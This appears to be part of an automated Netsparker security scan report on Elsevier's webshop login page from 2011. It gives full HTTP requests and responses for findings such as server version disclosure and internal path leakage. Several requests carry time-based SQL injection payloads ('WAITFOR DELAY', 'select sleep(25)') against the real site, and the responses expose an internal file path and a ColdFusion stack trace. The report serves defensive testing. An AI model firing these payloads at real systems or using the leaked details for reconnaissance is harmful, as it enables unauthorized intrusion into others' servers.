https://webshop.elsevier.com/login.cfm?d46=1;WAITFOR%20DELAY%20%270:0:25%27--

Parameters

Parameter Type Value
d46 GET 1;WAITFOR DELAY '0:0:25'--
login_customertype POST returning_customer
login_mailto POST netsparker@example.com
login_rua POST 1
password POST 3
signup_mailto POST netsparker@example.com
target POST http://webshop.elsevier.com/customer/mydesk.cfm

Found E-mails

webshop@elsevier.com

Request

POST /login.cfm?d46=1;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://webshop.elsevier.com/login.cfm?d46
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: webshop.elsevier.com
Cookie: CFID=1230996; CFTOKEN=33337590; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D
Content-Length: 202
Accept-Encoding: gzip, deflate

login_customertype=returning_customer&login_mailto=netsparker%40example.com&login_rua=1&password=3&signup_mailto=netsparker%40example.com&target=http%3a%2f%2fwebshop.elsevier.com%2fcustomer%2fmydesk.cfm

Response

HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 22:41:41 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<!-- Developed by Ritense webtechnology -->
<!-- http://www.ritense.com -->
<!-- All rights reserved -->

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Elsevier Webshop</title>
<meta name="description" content="Elsevier webshop." />
<meta name="keywords" content="Elsevier,webshop" />
<meta name="robots" content="noindex,nofollow" />
</head>

<body>


<script type="text/javascript">
function showMessage() {
alert('Your account has been disabled.\nPlease contact webshop@elsevier.com for help.\n ')
}
setTimeout("showMessage()", 50)
</script>


</body>

</html>
IIS Version Disclosure

IIS Version Disclosure
1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /login.cfm

/login.cfm

https://webshop.elsevier.com/login.cfm?d46

Extracted Version

Microsoft-IIS/7.0

Request

POST /login.cfm?d46 HTTP/1.1
Referer: https://webshop.elsevier.com/login.cfm?d46
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: webshop.elsevier.com
Cookie: CFID=1230996; CFTOKEN=33337590; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D
Content-Length: 153
Accept-Encoding: gzip, deflate

login_customertype=returning_customer&login_mailto=&login_rua=1&password=&signup_mailto=&target=http%3a%2f%2fwebshop.elsevier.com%2fcustomer%2fmydesk.cfm

Response

HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 22:41:19 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<!-- Developed by Ritense webtechnology -->
<!-- http://www.ritense.com -->
<!-- All rights reserved -->

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Elsevier Webshop</title>
<meta name="description" content="Elsevier webshop." />
<meta name="keywords" content="Elsevier,webshop" />
<meta name="robots" content="noindex,nofollow" />
</head>

<body>


<script type="text/javascript">
function showMessage() {
alert('Please enter your e-mail address!\n\n Please enter your password!\n\n ')
}
setTimeout("showMessage()", 50)
</script>


</body>

</html>
[Possible] Internal Path Leakage (Windows)

[Possible] Internal Path Leakage (Windows)
1 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this file path was actually the real file path of the target web server.

External References

- /login.cfm

/login.cfm

https://webshop.elsevier.com/login.cfm?d46=(select+sleep(25))a--+1

Identified Internal Path(s)

D:\wwwroot\elsevier_Estreet\onError.cfm

Request

GET /login.cfm?d46=(select+sleep(25))a--+1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: webshop.elsevier.com
Cookie: CFID=1230999; CFTOKEN=12747347; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 The request has exceeded the allowable time limit Tag: cfoutput
Transfer-Encoding: chunked
Content-Type: text/html
Server: Microsoft-IIS/7.0
server-error: true
Date: Mon, 02 May 2011 22:45:04 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>500 - Internal server error.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>500 - Internal server error.</h2>
<h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3>
</fieldset></div>
</div>
</body>
</html>
<script type="text/javascript" src="/cfformscripts/cfform.js"></script><script type="text/javascript" src="/cfformscripts/masks.js"></script>
<title>Elsevier Webshop</title>
<meta name="description" content="Elsevier webshop." />
<meta name="keywords" content="Elsevier,webshop" />
<meta name="robots" content="noindex,nofollow" />
<script type="text/javascript"><!-- _CF_checkloginForm = function(_CF_this) { //reset on submit _CF_error_exists = false; _CF_error_messages = new Array(); _CF_error_fields = new Object(); _CF_FirstErrorField = null; //form element login_mailto 'EMAIL' validation checks if (!_CF_checkEmail(_CF_this['login_mailto'].value, false)) { _CF_onError(_CF_this, "login_mailto", _CF_this['login_mailto'].value, "Please enter a valid e-mail address."); _CF_error_exists = true; } //form element signup_mailto 'EMAIL' validation checks if (!_CF_checkEmail(_CF_this['signup_mailto'].value, false)) { _CF_onError(_CF_this, "signup_mailto", _CF_this['signup_mailto'].value, "Please enter a valid e-mail address."); _CF_error_exists = true; } //display error messages and return success if( _CF_error_exists ) { if( _CF_error_messages.length > 0 ) { // show alert() message _CF_onErrorAlert(_CF_error_messages); // set focus to first form error, if the field supports js focus(). if( _CF_this[_CF_FirstErrorField].type == "text" ) { _CF_this[_CF_FirstErrorField].focus(); } } return false; }else { return true; } }//--></script><!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">


<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The request has exceeded the allowable time limit Tag: cfoutput
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">

</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>


<tr>
<td width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">

The error occurred in <b>D:\wwwroot\elsevier_Estreet\onError.cfm: line 59</b><br>


</td>
</tr>

<tr>
<td colspan="2">


<pre>57 : &lt;p&gt;Please provide the following information to technical support:&lt;/p&gt;
58 :
<b>59 : &lt;cfoutput&gt;</b>
60 :
61 : &lt;p&gt;
</pre>


</td>
</tr>
<tr>
<td colspan="2">
<hr color="#C0C0C0" noshade>
</td>
</tr>

<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Check the <a href='http://www.adobe.com/go/prod_doc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.adobe.com/go/prod_support/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana"></td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">03-May-11 12:45 AM</td>
</tr>
</table>
</td>
</tr>
</table>


<table width="500" cellpadding="0" cellspacing="0">
<tr>
<td valign="top">
<font style="FONT: 8pt/11pt verdana;">

<a href="javascript:;" onMouseOver="window.status='Click to expand stack trace';return true;" onMouseOut="window.status='';return true;" onClick="showHide('cf_stacktrace');return true;">Stack Trace (click to expand)</a>

</td>
</tr>
<tr>
<td id="cf_stacktrace" style="display:none">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
at cfonError2ecfm215532197$funcONERROR.runFunction(D:\wwwroot\elsevier_Estreet\onError.cfm:59)
<br />
<br />
<pre>coldfusion.runtime.RequestTimedOutException: The request has exceeded the allowable time limit Tag: cfoutput at coldfusion.tagext.io.OutputTag.doStartTag(OutputTag.java:149) at cfonError2ecfm215532197$funcONERROR.runFunction(D:\wwwroot\elsevier_Estreet\onError.cfm:59) at coldfusion.runtime.UDFMethod.invoke(UDFMethod.java:472) at coldfusion.runtime.UDFMethod$ArgumentCollectionFilter.invoke(UDFMethod.java:368) at coldfusion.filter.FunctionAccessFilter.invoke(FunctionAccessFilter.java:55) at coldfusion.runtime.UDFMethod.runFilterChain(UDFMethod.java:321) at coldfusion.runtime.UDFMethod.invoke(UDFMethod.java:220) at coldfusion.runtime.TemplateProxy.invoke(TemplateProxy.java:490) at coldfusion.runtime.TemplateProxy.invoke(TemplateProxy.java:336) at coldfusion.runtime.AppEventInvoker.invoke(AppEventInvoker.java:88) at coldfusion.runtime.AppEventInvoker.onError(AppEventInvoker.java:427) at coldfusion.filter.ApplicationFilter.invoke(ApplicationFilter.java:408) at coldfusion.filter.RequestMonitorFilter.invoke(RequestMonitorFilter.java:48) at coldfusion.filter.MonitoringFilter.invoke(MonitoringFilter.java:40) at coldfusion.filter.PathFilter.invoke(PathFilter.java:87) at coldfusion.filter.ExceptionFilter.invoke(ExceptionFilter.java:70) at coldfusion.filter.ClientScopePersistenceFilter.invoke(ClientScopePersistenceFilter.java:28) at coldfusion.filter.BrowserFilter.invoke(BrowserFilter.java:38) at coldfusion.filter.NoCacheFilter.invoke(NoCacheFilter.java:46) at coldfusion.filter.GlobalsFilter.invoke(GlobalsFilter.java:38) at coldfusion.filter.DatasourceFilter.invoke(DatasourceFilter.java:22) at coldfusion.filter.CachingFilter.invoke(CachingFilter.java:53) at coldfusion.CfmServlet.service(CfmServlet.java:200) at coldfusion.bootstrap.BootstrapServlet.service(BootstrapServlet.java:89) at jrun.servlet.FilterChain.doFilter(FilterChain.java:86) at coldfusion.monitor.event.MonitoringServletFilter.doFilter(MonitoringServletFilter.java:42) at coldfusion.bootstrap.BootstrapFilter.doFilter(BootstrapFilter.java:46) at jrun.servlet.FilterChain.doFilter(FilterChain.java:94) at jrun.servlet.FilterChain.service(FilterChain.java:101) at jrun.servlet.ServletInvoker.invoke(ServletInvoker.java:106) at jrun.servlet.JRunInvokerChain.invokeNext(JRunInvokerChain.java:42) at jrun.servlet.JRunRequestDispatcher.invoke(JRunRequestDispatcher.java:286) at jrun.servlet.ServletEngineService.dispatch(ServletEngineService.java:543) at jrun.servlet.jrpp.JRunProxyService.invokeRunnable(JRunProxyService.java:203) at jrunx.scheduler.ThreadPool$DownstreamMetrics.invokeRunnable(ThreadPool.java:320) at jrunx.scheduler.ThreadPool$ThreadThrottle.invokeRunnable(ThreadPool.java:428) at jrunx.scheduler.ThreadPool$UpstreamMetrics.invokeRunnable(ThreadPool.java:266) at jrunx.scheduler.WorkerThread.run(WorkerThread.java:66)</pre></td>
</tr>
</table>

</font>
</td>
</tr>
</table>
</body></html>